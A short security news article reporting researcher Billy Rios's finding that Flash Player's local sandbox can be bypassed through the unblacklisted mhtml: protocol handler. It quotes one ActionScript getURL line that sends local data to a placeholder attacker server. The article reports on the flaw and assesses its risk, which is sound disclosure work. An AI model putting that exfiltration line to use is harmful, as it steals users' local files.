Flash Player sandbox can be bypassed
Flash applications run locally can read local files and send them to an online server – something which the sandbox is supposed to prevent.
Flash includes a number of sandboxes which impose restrictions depending on the origin of, and access rights for, the SWF file. Local SWF files, for example, run within the local-with-file-system sandbox, are permitted to access local files. They are not able to access the network, so a malicious SWF applet should not be able to send local data to a remote server.
However, Security specialist Billy Rios has determined that Adobe controls access to the network using a blacklist of protocol handlers. Protocols such as HTTP and HTTPS are blacklisted. Rios reports that it is in principle possible to send files to a server using the file: protocol handler, but that this is only possible within the local area network. He has identified another protocol handler which can be used to send data to remote servers – mhtml.
Mhtml is supported by default under Windows, so that, according to Rios, local data can be sent to a remote server using the ActionScript command: getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);. Rios has not provided a specific demo SWF file to illustrate the problem.
It is certainly surprising that it is so easy to bypass one of the Flash sandboxes. However, this particular issue does not represent a major risk as few users download SWF files and run them locally. SWF files are generally loaded directly in a browser Flash plug-in, which uses a different rule set.